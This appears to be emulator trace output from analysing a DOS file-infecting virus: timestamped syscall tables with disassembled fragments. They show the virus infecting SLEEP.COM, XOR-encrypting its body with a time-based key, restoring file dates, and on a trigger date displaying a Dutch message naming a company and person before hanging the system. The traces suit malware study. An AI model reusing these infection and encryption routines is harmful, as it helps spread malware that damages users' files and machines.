.
Time | Syscall Op | Syscall Name |
---|---|---|
2018-12-17T22:19:46.558557694Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-17T22:19:46.561138175Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-17T22:19:46.562183057Z | 78 | PC: 12aa5 | Find first file |
2018-12-17T22:19:46.567867284Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-17T22:19:46.573568955Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-17T22:19:46.589691226Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-17T22:19:46.593887557Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-17T22:19:46.595147204Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-17T22:19:46.599469725Z | 66 | PC: 12af8 | Move file pointer |
2018-12-17T22:19:46.600592415Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-17T22:19:46.602173885Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-17T22:19:46.607604834Z | 66 | PC: 12af8 | Move file pointer |
2018-12-17T22:19:46.608600436Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-17T22:19:46.612682234Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-17T22:19:46.614397371Z | 62 | PC: 12b61 | Close file |
2018-12-17T22:19:46.619717793Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-17T22:19:46.632181994Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | Syscall Name |
---|---|---|
2018-12-25T11:49:00.328981245Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.331909429Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-25T11:49:00.333711283Z | 78 | PC: 12aa5 | Find first file |
2018-12-25T11:49:00.341421675Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-25T11:49:00.348734055Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-25T11:49:01.515658207Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-25T11:49:01.523695273Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-25T11:49:01.525269631Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-25T11:49:01.532317494Z | 66 | PC: 12af8 | Move file pointer |
2018-12-25T11:49:01.534199853Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-25T11:49:01.536536227Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-25T11:49:01.545161176Z | 66 | PC: 12af8 | Move file pointer (See above) |
2018-12-25T11:49:01.54676955Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-25T11:49:01.553907784Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-25T11:49:01.55526328Z | 62 | PC: 12b61 | Close file |
2018-12-25T11:49:01.563973269Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-25T11:49:01.575291783Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | Syscall Name |
---|---|---|
2018-12-25T11:49:00.419848411Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.42193974Z | 9 | PC: 12a89 | Display string (String= ' RTL4 Joop van den Ende Produkties BV Marco Daas (Casting Assistent) Postbus 397 1430 AJ AALSMEER van Cleeffkade 15 1413 BA AALSMEER The Netherlands Wedden dat... je een virus hebt? ') |
.
Time | Syscall Op | Syscall Name |
---|---|---|
2018-12-25T11:49:00.530753822Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.533375252Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | Syscall Name |
---|---|---|
2018-12-25T11:49:00.934847234Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.937651295Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-25T11:49:00.938615115Z | 78 | PC: 12aa5 | Find first file |
2018-12-25T11:49:00.945099394Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-25T11:49:00.952220487Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-25T11:49:00.967860463Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-25T11:49:00.975014814Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-25T11:49:00.984107676Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-25T11:49:00.991386117Z | 66 | PC: 12af8 | Move file pointer |
2018-12-25T11:49:00.993162066Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-25T11:49:00.995636713Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-25T11:49:01.004118866Z | 66 | PC: 12af8 | Move file pointer (See above) |
2018-12-25T11:49:01.005372833Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-25T11:49:01.011992032Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-25T11:49:01.013699484Z | 62 | PC: 12b61 | Close file |
2018-12-25T11:49:01.021238828Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-25T11:49:01.031182063Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | Syscall Name |
---|---|---|
2018-12-25T11:49:01.741311159Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:01.743857399Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-25T11:49:01.744808473Z | 78 | PC: 12aa5 | Find first file |
2018-12-25T11:49:01.750646258Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-25T11:49:01.756571137Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-25T11:49:01.772600645Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-25T11:49:01.779058123Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-25T11:49:01.780762309Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-25T11:49:01.786799836Z | 66 | PC: 12af8 | Move file pointer |
2018-12-25T11:49:01.788003727Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-25T11:49:01.790422763Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-25T11:49:01.798294351Z | 66 | PC: 12af8 | Move file pointer (See above) |
2018-12-25T11:49:01.799302912Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-25T11:49:01.80337281Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-25T11:49:01.805011789Z | 62 | PC: 12b61 | Close file |
2018-12-25T11:49:01.81223854Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-25T11:49:01.821513987Z | 26 | PC: 12b4e | Set disk transfer address |